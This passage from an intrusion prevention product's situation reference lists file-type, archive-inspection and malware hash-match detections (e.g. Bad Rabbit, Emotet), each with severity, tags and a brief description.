Description: Adobe Flash is an interactive animation and multimedia programming framework. It was originally developed by Macromedia. MIME type: application/x-shockwave-flash
Back to top

File_Adobe-Flash-Video

About this situation: Adobe Flash video file detected
Context: File Type
Severity: 1
Tags: Adobe Flash Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: Adobe Flash multimedia software platform is able to display proprietary video streams over the internet.
Back to top

File_Adobe-Photoshop-Document

About this situation: Adobe Photoshop Document file detected
Context: File Type
Severity: 1
Tags: Adobe Photoshop Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Adobe Photoshop is a raster graphic editing program develped by Adobe Systems. It uses its own binary file format to store images.
Back to top

File_Adobe-PostScript

About this situation: Adobe PostScript file detected
Context: File Type
Severity: 1
Tags: Adobe PostScript, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Adobe PostScript file detected.
Back to top

File_Allowed

About this situation: File allowed according to the file filtering policy
Context: File Filtering
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: A file has been allowed according to the file filtering policy. The file has either been directly allowed in the file filtering policy based on the file type, or the file has been scanned but nothing malicious was found.
Back to top

File_Android-Application-Package

About this situation: Android Application Package file detected
Context: File Type
Severity: 1
Tags: Android Application Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Description: Android Application package contains exectable code, resources and other associated metadata for a single application intended for Android mobile operating system developed by Google. MIME type: application/zip
Back to top

File_Android-Compressed-Resources

About this situation: Android compressed resources file detected
Context: File Type
Severity: 1
Tags: Android Compressed Resources, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Description: The compressed resources files contains resource data, such as strings, in a compressed form to save space. Resources are typically required part of an executable Android applications.
Back to top

File_Android-Compressed-XML

About this situation: Android compressed XML file detected
Context: File Type
Severity: 1
Tags: Android Compressed XML, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Description: The compressed XML files contains the text based XML file a compressed form to save space for the Android operating system.
Back to top

File_Android-Dalvik-Executable

About this situation: Andoid Dalvik executable file detected
Context: File Type
Severity: 1
Tags: Android Dalvik Executable, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Description: Dalvik is the runtime and bytecode execution environment for the Android operating system. The executable file contains bytecode and classes required for the execution of the Android application. MIME type: application/x-dex
Back to top

File_Apple-Binary-Property-List

About this situation: Apple binary property list file detected
Context: File Type
Severity: 1
Tags: Apple Binary Property List, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Description: Property lists (plist) store serialized objects in Apple Mac OS X, iOS and related operating systems. This is a binary variant of the XML file format.
Back to top

File_Apple-BXDIFF

About this situation: Apple BXDIFF file detected
Context: File Type
Severity: 1
Tags: Apple BXDIFF, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Description: BXDIFF file is a propietary patch file that is used when upgrading operating system installation from a version to another in Mac OS X or related operating systems.
Back to top

File_Apple-Connectivity-Test

About this situation: Apple connectivity test detected
Context: File Type
Severity: 1
Tags: Apple Connectivity Test, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Description: Connectivity test and captive portal page detection is a feature of Apple iOS operating system. For this purpose a small text file is downloaded.
Back to top

File_Apple-Core-Audio-Format

About this situation: Apple Core Audio Format file detected
Context: File Type
Severity: 1
Tags: Apple Core Audio Format, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-761-5211
Description: Core Audio Format (CAF) is used to store and transport digital audio. It has been developed by Apple and it is supported by both Mac OS X and iOS operating systems.
Back to top

File_Apple-Core-Data-Object-Model

About this situation: Apple Core Data object model file detected
Context: File Type
Severity: 1
Tags: Apple Core Data Object Model, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-761-5211
Description: Core Data is an object persistance framework developed by Apple. Core Data Object Models uses a binary file format.
Back to top

File_Apple-DMG-Disk-Image

About this situation: DMG disk image file detected
Context: File Type
Severity: 1
Tags: Apple DMG Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Apple DMG disk image file detected. MIME type: application/x-apple-diskimage
Back to top

File_Apple-Installer-BOM

About this situation: Apple Installer BOM file detected
Context: File Type
Severity: 1
Tags: Apple Installer BOM, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Description: The BOM or bill of materials file is used by the Apple Installer to determine which files to install, upgrade and remote during the installation process. MIME type: application/x-xar
Back to top

File_Apple-iOS-Application-Installation-Package

About this situation: Apple iOS application installation file detected
Context: File Type
Severity: 1
Tags: Apple iOS Application Installation Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: Apple iOS Application installation package detected. MIME type: application/zip
Back to top

File_Apple-iOS-Firmware-Image

About this situation: Apple Firmware Image file detected
Context: File Type
Severity: 1
Tags: Apple iOS Firmware Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Description: The firmware image contains the bootloader and operating system code for iOS devices, such as iPhone and iPad.
Back to top

File_Apple-Pages-Document

About this situation: Potentially an Apple Pages document file detected
Context: File Type
Severity: 1
Tags: Apple Pages Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Pages is a word processing application developed by Apple Inc. It is a part of iWork office suite. MIME type: application/zip
Back to top

File_Apple-Pages-Filename-Extension

About this situation: Potentially an Apple Pages document file detected
Context: File Type
Severity: 1
Tags: Apple Pages Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Potentially an Apple Pages document file was detected. This detection is based on the filename, and filename alone.
Back to top

File_Apple-PBZX-Package

About this situation: PBZX package file detected
Context: File Type
Severity: 1
Tags: Apple PBZX Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Description: Propietary PBZX package files are used by Apple in iOS updates to store binary data. MIME type: application/x-xar
Back to top

File_Apple-Pict

About this situation: Apple Pict image file detected
Context: File Type
Severity: 1
Tags: Apple Pict, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Pict is a legacy image and metafile file format developed by Apple for classic Macintosh operating systems.
Back to top

File_Apple-QuickTime-Media

About this situation: Apple QuickTime file detected
Context: File Type
Severity: 1
Tags: MPEG Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: QuickTime is a multimedia framework developed by Apple Inc., and it is able to handle various video, picture and audio formats.
Back to top

File_Apple-Vector-Map-Tile

About this situation: Apple vector map tile detected
Context: File Type
Severity: 1
Tags: Apple Vector Map Tile, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Apple Maps is an application for both iOS and macOS to display geographical maps. It uses vectorized tiles, stored in a proprietary file format.
Back to top

File_Applix-Graphics

About this situation: Applix graphics file detected
Context: File Type
Severity: 1
Tags: Applix Graphics, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Applix graphics file detected.
Back to top

File_Ar-Archive

About this situation: Ar archive file detected
Context: File Type
Severity: 1
Tags: Ar Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1730-5242
Description: Ar archive file detected.
Back to top

FILE_Archive-Checksum-Mismatch

About this situation: Archive checksum mismatch
Context: File decompression without parameters
Severity: 1
Tags: Possibly Unwanted Content
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-595-5211
Description: The inspection module has determined that the archived file does not match the given checksum. This may be related to stream-based processing of ZIP files and can occur with entirely legitimate files.
Back to top

FILE_Archive-Compression-Method-Unsupported

About this situation: Unsupported compression method
Context: File decompression without parameters
Severity: 2
Tags: Possibly Unwanted Content
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Description: The inspection module has detected that the archive is compressed using an unsupported method. No further inspection is possible.
Back to top

FILE_Archive-Decompression-Failed

About this situation: Archive decompression failed
Context: File decompression without parameters
Severity: 1
Tags: Possibly Unwanted Content
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-595-5211
Description: The inspection module was unable to decompress the archive. This may be related to stream-based processing of ZIP files and can occur with entirely legitimate files.
Back to top

FILE_Archive-Has-High-Compression-Ratio

About this situation: Archive has high compression ratio
Context: File decompression without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Description: The inspection module has detected that the archive has a high compression ratio. The decompressed output may be very large.
Back to top

FILE_Archive-Has-Trailing-Data

About this situation: Archive contains trailing data
Context: File decompression without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-570-5211
Description: The inspection module has determined that the file contains trailing data which is not part of the archive. This trailing data may be potentially harmful.
Back to top

FILE_Archive-Potential-Denial-Of-Service-Attack

About this situation: Potential Denial of Service attack
Context: File decompression without parameters
Severity: 6
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-570-5211
Description: The inspection module has determined that the archive contains a potential Denial of Service attack against the inspection module.
Back to top

File_ARJ-Archive

About this situation: ARJ archive file detected
Context: File Type
Severity: 1
Tags: ARJ Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: ARJ archive file detected.
Back to top

File_ASPX

About this situation: ASPX file detected
Context: File Type
Severity: 1
Tags: ASPX, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1191-5242
Last changed: sgpkg-ips-1191-5242
Description: Active Server Page Extended (ASPX) is a file designed for Microsoft's ASP.NET framework. They contain scripts and code that are generated on the server side to produce dynamic web pages which are sent to the user's web browser.
Back to top

File_Autodesk-Autocad-DWF

About this situation: Autocad DWF file detected
Context: File Type
Severity: 1
Tags: Autodesk Autocad DWF File, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Autocad is a commercial application for 2D and 3D computer aided design (CAD), developed by Autodesk. Design Web Format (DWF) is a file format it uses to store drawings for distribution.
Back to top

File_Autodesk-Autocad-DWG

About this situation: Autocad DWG file detected
Context: File Type
Severity: 1
Tags: Autodesk Autocad DWG, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Autocad is a vector graphic drawing application developed by Autodesk in 1982. It uses a proprietary native file format.
Back to top

File_Autodesk-Autocad-DXF

About this situation: Autocad Drawing Exchange Format (DXF) image file detected
Context: File Type
Severity: 1
Tags: Autodesk Autocad DXF, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Autodesk's AutoCAD is a Computer Aided Design application. Drawing Exchange Format (DXF) is a file format enabling data interchange between AutoCAD and other similar applications.
Back to top

File_Autodesk-Autocad-FAS

About this situation: Autocad FAS file detected
Context: File Type
Severity: 1
Tags: Autodesk Autocad FAS, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Autodesk Autocad FAS file detected.
Back to top

File_Autodesk-Flic-Video

About this situation: Flic video file detected
Context: File Type
Severity: 1
Tags: Autodesk Flic Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: FLIC animation file format was originally develped by Autodesk for Autodesk Animator in 1993.
Back to top

File_Avast-AntiVirus-Filereputation-Update

About this situation: Avast Antivirus update file detected
Context: File Type
Severity: 1
Tags: Avast AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1689-5242
Last changed: sgpkg-ips-1689-5242
Description: Avast File Reputation service is used for validating the known reputation of an executable file.
Back to top

File_Avast-AntiVirus-Update

About this situation: Avast Antivirus update file detected
Context: File Type
Severity: 1
Tags: Avast AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Description: Avast Antivirus update and installation file delivers various components of the Avast Antivirus as well as up-to-date malware detection database and associated metadata.
Back to top

File_Avg-AntiVirus-Update

About this situation: AVG Antivirus update file detected
Context: File Type
Severity: 1
Tags: Avg AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-753-5211
Description: AVG Antivirus update file deliveres up-to-date malware detection database and associated metadata.
Back to top

File_Avira-AntiVirus-Update

About this situation: Avira Antivirus update file detected
Context: File Type
Severity: 1
Tags: Avira AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: Detected an Avira Antivirus Update file. This file provides detection updates for Avira's security products.
Back to top

File_Bad-Rabbit-Ransomware-Binary-MD5

About this situation: Bad Rabbit Ransomware binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Description: A file that has a MD5 checksum associated to a file related to the Bad Rabbit ransomware has been detected. Bad Rabbit ransomware spreads by a fake Flash update and encrypts files on the file system.
Back to top

File_Bad-Rabbit-Ransomware-Binary-SHA1

About this situation: Bad Rabbit Ransomware binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Description: A file that has a SHA1 checksum associated to a file related to the Bad Rabbit ransomware has been detected. Bad Rabbit ransomware spreads by a fake Flash update and encrypts files on the file system.
Back to top

File_Batch-File

About this situation: Batch file detected
Context: File Type
Severity: 1
Tags: Batch File, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-944-5242
Description: A batch file consists of a series of commands for the command-line interpreter to execute. MIME type: text/x-msdos-batch
Back to top

File_BIF-Video-Preview-Thumbnails

About this situation: BIF Video Preview Thumbnails file detected
Context: File Type
Severity: 1
Tags: BIF Video Preview Thumbnails, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Description: BIF video preview thumbnails file was detected. This file is used to provide previews for a video for the purposes of rewinding or fast forwarding. It is used by Netflix, Roxio and Plex among other similar services.
Back to top

File_BitDefender-AntiVirus-Update

About this situation: BitDefender Antivirus update file detected
Context: File Type
Severity: 1
Tags: BitDefender AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Description: BitDefender Antivirus update file deliveres up-to-date malware detection database and associated metadata.
Back to top

File_Bitmap-Image

About this situation: Bitmap file detected
Context: File Type
Severity: 1
Tags: Bitmap Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-741-5211
Description: Bitmap image file, also known as device independent bitmap file format, is a raster graphics image file. It is used especially in legacy systems.
Back to top

File_BitTorrent-Metadata

About this situation: BitTorrent metadata file detected
Context: File Type
Severity: 1
Tags: BitTorrent Metadata, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Description: BitTorrent is a popular distributed peer-to-peer file sharing protocol over the internet.
Back to top

File_Blizzard-BLTE

About this situation: Blizzard BLTE file detected
Context: File Type
Severity: 1
Tags: Blizzard BLTE, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Description: BLTE is a proprietary data format used by Blizzard Entertanment to store content and other game-related data.
Back to top

File_Blizzard-MPQ-Archive

About this situation: MPQ archive file detected
Context: File Type
Severity: 1
Tags: Blizzard MPQ Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Blizzard MPQ archive file detected.
Back to top

File_Blocked

About this situation: File blocked according to the file filtering policy
Context: File Filtering
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-594-5211
Last changed: sgpkg-ips-1531-5242
Description: A file has been blocked according to the file filtering policy.
Back to top

File_Blocked-Bad-SHA1-Hash

About this situation: Malicious File Blocked based on SHA1 Hash
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-912-5242
Last changed: sgpkg-ips-912-5242
Description: A file has been blocked based on the first bytes matching to a known bad SHA1 checksum.
Back to top

File_Blocked-Known-Bad-SHA1

About this situation: Known Malicious File Blocked based on SHA1
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-819-5242
Description: A file has been blocked based on the first bytes matching to a known bad SHA1 checksum.
Back to top

File_Blocked-Known-Bad-SHA1-2

About this situation: Known Malicious File Blocked based on SHA1
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description: A file has been blocked based on the first bytes matching to a known bad SHA1 checksum.
Back to top

File_Blocked-Known-Bad-SHA1-Hash

About this situation: Known Malicious File Blocked based on SHA1 Hash
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-861-5242
Last changed: sgpkg-ips-861-5242
Description: A file has been blocked based on the first bytes matching to a known bad SHA1 checksum.
Back to top

File_BZip2-Compressed

About this situation: BZip2 compressed file detected
Context: File Type
Severity: 1
Tags: BZip2 Compressed File, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: BZip2 compressed file detected. MIME type: application/x-bzip
Back to top

File_Candy-Crush-Binary-MD5

About this situation: Candy Crush Binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Tunneling Protocols
First detected in: sgpkg-ips-916-5242
Last changed: sgpkg-ips-916-5242
Description: Candy Crush Binary file transfer was detected.
Back to top

File_Cascading-Style-Sheet

About this situation: Cascading Style Sheet file detected
Context: File Type
Severity: 1
Tags: Cascading Style Sheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Description: Cascading Style Sheets (CSS) is a style sheet language. It is typically used within conjunction with HTML to desribe the presentation of a document.
Back to top

File_CD-ROM-Disk-Image

About this situation: CD-ROM disk image file detected
Context: File Type
Severity: 1
Tags: CD ROM Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Compact Disc Read-Only Memory, or CD-ROM, is a optical data disc. The CD-ROM disk image file contains contents of a single CD-ROM disc.
Back to top

File_Cisco-Webex-Recording

About this situation: Cisco Webex recording video file detected
Context: File Type
Severity: 1
Tags: Cisco Webex Recording, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Webex is a collabration, online meeting and conferencing application. It can save a recording from an online event stored into a proprietary video format.
Back to top

File_Clamav-AntiVirus-Update

About this situation: ClamAV Antivirus update file detected
Context: File Type
Severity: 1
Tags: Clamav AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-735-5211
Description: ClamAV is an open source antivirus program that detects malicious programs and other unwanted content.
Back to top

File_Commodore-Amiga-Disk-Image

About this situation: Commodore Amiga disk image file detected
Context: File Type
Severity: 1
Tags: Commodore Amiga Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Description: Commodore Amiga is a 16/32-bit microcomputer produced by Commodore Business Machines. It uses its own propietary disk operating system, Amiga DOS.
Back to top

File_Commodore-DOS-Disk-Image

About this situation: Commodore DOS disk image file detected
Context: File Type
Severity: 1
Tags: Commodore DOS Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Description: Commodore DOS is the disk operating system used in legacy 8-bit microcomputers produced by Commodore Business Machines.
Back to top

File_Compress

About this situation: Unix Compress compressed file detected
Context: File Type
Severity: 1
Tags: Compress, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-766-5211
Description: Compress is a legacy Unix file compression tool originally developed in 1984.
Back to top

File_Computer-Graphics-Metafile

About this situation: Computer Graphics Metafile (CGM) file detected
Context: File Type
Severity: 1
Tags: Computer Graphics Metafile, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Computer Graphics Metafile (CGM) is an open file format for 2D vector and raster graphics. It has been standardized by ISO/IEC 8632.
Back to top

File_Cryptonight-Miner-Binary-SHA1

About this situation: Cryptonight miner binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Description: A SHA1 checksum associated with a file related to the Cryptonight miner has been detected.
Back to top

File_Cyren-AntiVirus-Update

About this situation: Cyren Antivirus update file detected
Context: File Type
Severity: 1
Tags: Cyren AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: Detected a Cyren Antivirus Update file. This file provides detection updates for Cyren's security products.
Back to top

File_Debian-Binary-Installation-Package

About this situation: Debian binary installation package file detected
Context: File Type
Severity: 1
Tags: Debian Binary Installation Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Debian uses binary installaton packages to install and update software. The binary installation package contains executable files for the application software, as well as installation scripts.
Back to top

File_Digmine-Cryptocurrency-Miner-Binary-SHA1

About this situation: Digmine Cryptocurrency Miner binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1027-5242
Last changed: sgpkg-ips-1027-5242
Description: A file that has a SHA1 checksum associated to a file related to the Digmine Cryptocurrency Miner malware has been detected. Digmine Cryptocurrency Miner malware spreads via Facebook Messenger.
Back to top

File_Disk-Masher-System-Image

About this situation: Disk Masher System image file detected
Context: File Type
Severity: 1
Tags: Disk Masher System Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Description: Disk Masher System (DMS) is a propietary disk image archiving and compression utility for Commodore Amiga microcomputers.
Back to top

File_DroidVPN-Binary-MD5

About this situation: DroidVPN Binary MD5 match
Context: File MD5 hash
Severity: 1
Tags: Tunneling Protocols
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Description: DroidVPN Binary file transfer was detected. DroidVPN is a network traffic anonymization tool.
Back to top

File_ELF-Executable

About this situation: ELF executable file detected
Context: File Type
Severity: 1
Tags: ELF Executable, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Executable and Linkable Format, ELF, is a file format used to store executables, object code, libraries and crash dumps. It was originally developed for Unix System V Release 4 in 1988. MIME type: application/x-elf
Back to top

File_Embedded-OpenType-Font

About this situation: Embedded OpenType font file detected
Context: File Type
Severity: 1
Tags: Embedded OpenType Font, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-742-5211
Last changed: sgpkg-ips-742-5211
Description: Embedded OpenType fonts are optimized for the web use. They contain only required glyphs, and are compressed.
Back to top

File_Emotet-SHA1

About this situation: Emotet Malware Sha1sum detected.
Context: File SHA1 hash
Severity: 8
Tags: Inspection
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1116-5242
Description: A file associated with the Emotet malware based on the SHA1 checksum was detected.
Back to top

File_Empty

About this situation: Empty file detected
Context: File Type
Severity: 1
Tags: Empty, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Description: An empty file detected. This file has no content.
Back to top

FILE_Encrypted-Archive

About this situation: Encrypted archive
Context: File decompression without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-570-5211
Description: The inspection module has detected that the archive is encrypted. No further inspection is possible.
Back to top

File_Encrypted-Rar-Archive

About this situation: Encrypted Rar archive file detected
Context: File Type
Severity: 1
Tags: Encrypted Rar Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Description: An encrypted Rar archive file detected. Rar archive format supports password protected and encrypted archives. MIME type: application/x-rar
Back to top

File_Encrypted-Zip-Archive

About this situation: Encrypted ZIP File detected
Context: File Type
Severity: 1
Tags: Encrypted Zip Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Description: An encrypted ZIP File detected. Zip archive format supports password protected and encrypted archives. MIME type: application/zip
Back to top

File_Extended-M3U-Playlist

About this situation: Extended M3U playlist file detected
Context: File Type
Severity: 1
Tags: Extended M3U Playlist, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-736-5211
Description: Extended M3U playlists are files that describe location of audio or video sources and the associated metadata, such as title name and length. It is commonly with HTTP Live Streaming (HLS).
Back to top

File_F-Prot-AntiVirus-Update

About this situation: F-Prot Antivirus update file detected
Context: File Type
Severity: 1
Tags: F-Prot AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: F-Prot Antivirus Update contains signature updates for Frisk Software's F-Prot Antivirus product.
Back to top

File_F-Secure-AntiVirus-Update

About this situation: F-Secure Antivirus update file detected
Context: File Type
Severity: 1
Tags: F Secure AntiVirus Update, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-740-5211
Description: F-Secure Antivirus update file deliveres up-to-date malware detection database and associated metadata.
Back to top

File_Favicon

About this situation: Favicon.ico file detected
Context: File Type
Severity: 1
Tags: Favicon, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: Favicon.ico, or favorites icon file is a file that web browsers show as a site icon on the address bar or a bookmark icon in the bookmarks list. It is automatically downloaded by the browser.
Back to top

File_Felismus-Malware-Binary-SHA1

About this situation: Felismus Malware binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Description: A file that has a SHA1 checksum matching to Felismus Malware binary has been detected.
Back to top

File_FireEye-Red-Team-Tools-MD5

About this situation: FireEye Red Team Tools match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1304-5242
Description: A file that has a MD5 checksum matching a FireEye Red Team Tool has been detected. The below license applies to the content of this situation: Copyright 2020 by FireEye, Inc. The 2-Clause BSD License Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Back to top

File_FireEye-Red-Team-Tools-SHA1

About this situation: FireEye Red Team Tools match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1304-5242
Description: A file that has a SHA1 checksum matching a FireEye Red Team Tool has been detected. Source: https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit#gid=36102663
Back to top

File_Flash-Video-Stream

About this situation: Flash Video Stream media fragment detected
Context: File Type
Severity: 1
Tags: Adobe Flash Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-736-5211
Description: Adobe Flash is a dynamic video platform. Flash Video is an extension that allows streaming video content in the context of the Flash player. MIME type: application/x-shockwave-flash
Back to top

File_Forcepoint-SMC-Log

About this situation: Forcepoint SMC log file detected
Context: File Type
Severity: 1
